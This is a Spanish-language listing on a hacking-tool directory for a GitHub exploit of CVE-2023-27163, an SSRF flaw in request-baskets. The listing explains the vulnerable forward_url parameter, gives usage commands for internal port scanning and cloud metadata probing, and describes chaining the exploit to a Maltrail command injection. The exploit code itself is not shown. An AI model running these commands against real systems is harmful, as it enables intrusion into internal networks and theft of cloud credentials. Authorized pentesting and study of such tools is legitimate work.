Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-27163-exploit | Kitploit
Herramientas/GitHubGitHub/jeanback1/cve-2023-27163-exploit
ReconocimientoEscaneo de PuertosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad en la Nube
GitHubjeanback1/cve-2023-27163-exploit

CVE-2023-27163-exploit

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-27163 — exploit SSRF de request-baskets

Escribí este exploit para apuntar a CVE-2023-27163, una vulnerabilidad de Server-Side Request Forgery (SSRF) encontrada en request-baskets versiones ≤ 1.2.1. La falla se encuentra en el endpoint /api/baskets/{name}, donde el parámetro forward_url permite a un atacante hacer que el servidor realice solicitudes HTTP arbitrarias en su nombre.

Cómo funciona

El exploit crea una "basket" maliciosa configurada con un forward_url que apunta a un objetivo interno. Cualquier solicitud realizada al endpoint de esa basket es reenviada por el servidor a la URL especificada, convirtiendo efectivamente al servidor en un proxy SSRF.

Características

  • Reenvío de solicitudes SSRF a cualquier URL interna o externa
  • Escaneo de puertos en hosts internos mediante sonda HTTP
  • Sondeo de endpoints de metadatos de la nube (AWS, GCP, Azure, DigitalOcean, Alibaba)
  • Descubrimiento de servicios internos comunes
  • Perfiles de basket configurables (proxy, TLS inseguro, expansión de ruta)

Requisitos

  • Python 3.6+
  • Librería requests (pip install requests)

Uso

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-f FORWARD_URL] [--proxy-response]
                  [--insecure-tls] [--no-expand-path] [--capacity CAPACITY]
                  [--scan-host SCAN_HOST] [--ports PORTS] [--scan]
                  [--discover] [--cloud-metadata] [--timeout TIMEOUT]
                  [--delay DELAY]

Ejemplos

root@kitploit:~
# Basic SSRF forward to an internal service
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80/admin

# Port scan an internal host
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 127.0.0.1 --scan

# Probe cloud metadata endpoints
python3 exploit.py -t http://192.168.1.100:55555 --cloud-metadata

# Proxy mode (returns the forwarded response body)
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80 --proxy-response

# Custom port range scan
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 10.0.0.2 \
         --ports 80,443,3000,5000,8000,8080,9000

Aviso legal

Construí esta herramienta únicamente con fines educativos y para pruebas de seguridad autorizadas. No la uses contra sistemas sin permiso explícito.


Encadenar con

Este exploit SSRF se puede utilizar como punto de entrada inicial para alcanzar servicios internos que no están expuestos directamente. Lo diseñé para que funcione junto con el Maltrail-v0.53-Exploit — el túnel SSRF te permite alcanzar una instancia de Maltrail que se ejecuta en localhost y desencadenar la inyección de comandos a través de él.

CVE-2023-27163-exploit

Descargar herramienta